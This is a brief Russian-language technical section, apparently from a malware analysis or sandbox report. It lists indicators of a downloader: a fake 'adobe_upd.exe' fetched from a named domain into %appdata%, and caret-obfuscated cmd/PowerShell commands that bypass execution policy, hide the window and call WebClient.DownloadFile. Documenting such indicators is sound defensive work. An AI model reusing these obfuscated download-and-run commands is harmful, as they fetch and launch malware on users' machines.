Техническая информация
- http://sergiosuarezgil.com/adobe_upd.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ErS^h^E^Ll.^e^x^e ^-Ex^e^CU^t^I^o^N^p^O^LICy bYP^aS^S ^-N^O^ProFi^LE^ ^-w^inDOwSty^l^E ^hiDDEN (^n^EW^-OBJe^cT^ s^yStEm^.^Ne^T.We^bCLI^eNt)^.^DOwn^lOa^dfIL^E(^'http://se...
- DNS ASK se####suarezgil.com
- '<SYSTEM32>\cmd.exe' /C "POW^ErS^h^E^Ll.^e^x^e ^-Ex^e^CU^t^I^o^N^p^O^LICy bYP^aS^S ^-N^O^ProFi^LE^ ^-w^inDOwSty^l^E ^hiDDEN (^n^EW^-OBJe^cT^ s^yStEm^.^Ne^T.We^bCLI^eNt)^.^DOwn^lOa^dfIL^E(^'http://se...' (со скрытым окном)